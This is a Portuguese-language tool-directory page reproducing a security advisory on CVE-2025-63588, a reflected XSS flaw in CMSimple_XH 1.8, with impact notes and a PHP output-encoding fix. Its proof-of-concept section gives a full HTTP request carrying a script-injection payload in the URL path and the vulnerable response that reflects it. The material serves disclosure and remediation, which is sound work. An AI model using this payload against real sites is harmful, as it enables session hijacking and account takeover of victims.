Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-63588 — Prova de conceito detalhada para CVE-2025-63588, uma vulnerabilidade XSS refletida no CMSimple_XH 1.8, com pontuação CVSS, análise de impacto e exemplo de remediação de codificação segura. | Kitploit
Ferramentas/GitHubGitHub/cybercrewinc/cve-2025-63588
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

Prova de conceito detalhada para CVE-2025-63588, uma vulnerabilidade XSS refletida no CMSimple_XH 1.8, com pontuação CVSS, análise de impacto e exemplo de remediação de codificação segura.

Ver Repositório
2há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-63588 Cross-Site Scripting (XSS) Refletido no tratamento de caminho cmsimplexh do CMSimple_XH)

Estimativa CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Médio) CVE Atribuído: CVE-2025-63588
Produtos: CMSimple_XH - 1.8 Fornecedor: CMSimple_XH - https://www.cmsimple-xh.org/

Resumo

Uma vulnerabilidade de Cross-Site Scripting (XSS) refletido existe no código de análise do front-router do CMSimple_XH que lida com entradas dinâmicas relacionadas a login. A aplicação reflete dados controlados pelo atacante obtidos do URI da requisição diretamente no HTML gerado (por exemplo, em atributos action de formulários e hrefs de âncoras) sem a devida codificação de saída. Um atacante pode criar uma URL que, quando visitada por uma vítima, faz com que JavaScript arbitrário seja executado no navegador da vítima no contexto do site vulnerável.

Isso é um XSS refletido (não persistente); a exploração requer que uma vítima siga um link criado. O fornecedor foi informado e o problema foi documentado e atribuído ao CVE acima.

Impacto

  • Execução de código no lado do cliente — JavaScript arbitrário pode ser executado no contexto do site.
  • Divulgação de informações — scripts podem ler o conteúdo do DOM e quaisquer cookies ou tokens acessíveis ao cliente. Se os cookies de sessão não estiverem definidos como HttpOnly, os tokens de sessão podem ser roubados.
  • Sequestro de sessão / personificação — a exfiltração de tokens pode permitir a tomada de conta dependendo dos privilégios da vítima.
  • Phishing / falsificação de UI / ações forçadas — scripts injetados podem criar UI falsa, redirecionar o usuário ou enviar ações sob a sessão da vítima.

Componente afetado

A vulnerabilidade decorre do código do roteador frontal / index.php (ou controlador frontal equivalente) que analisa segmentos de caminho dinâmicos e os mapeia em variáveis de página/modelo. Fragmentos de caminho brutos (o fragmento estilo ?Templates... usado pelo roteador do CMSimple_XH) são passados para os modelos de página e injetados em atributos HTML sem a devida codificação ou sanitização de atributos HTML, permitindo que tags <script> injetadas ou outras cargas úteis sejam renderizadas literalmente. Problemas semelhantes de XSS refletido foram publicados para outros componentes web e são comumente causados pela codificação inadequada de saída de entradas não confiáveis.

Prova-de-Conceito (PoC)

Esta PoC demonstra a reflexão da entrada fornecida pelo atacante no HTML retornado, que será executada no navegador da vítima.

Requisição:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Pasted image 20251006200014

Resposta:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Pasted image 20251006200122

Quando o navegador da vítima renderiza esta página, o <script>alert(1)</script> injetado é executado. Pasted image 20251006204432 Pasted image 20251006204517

Exemplo sugerido em PHP para exibir com segurança um atributo action:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

Créditos

CVE Atribuído:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Descoberto por:株式会社CyberCrew / サイバークル

Referências

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — Your Trusted Security Partner.

Baixar ferramenta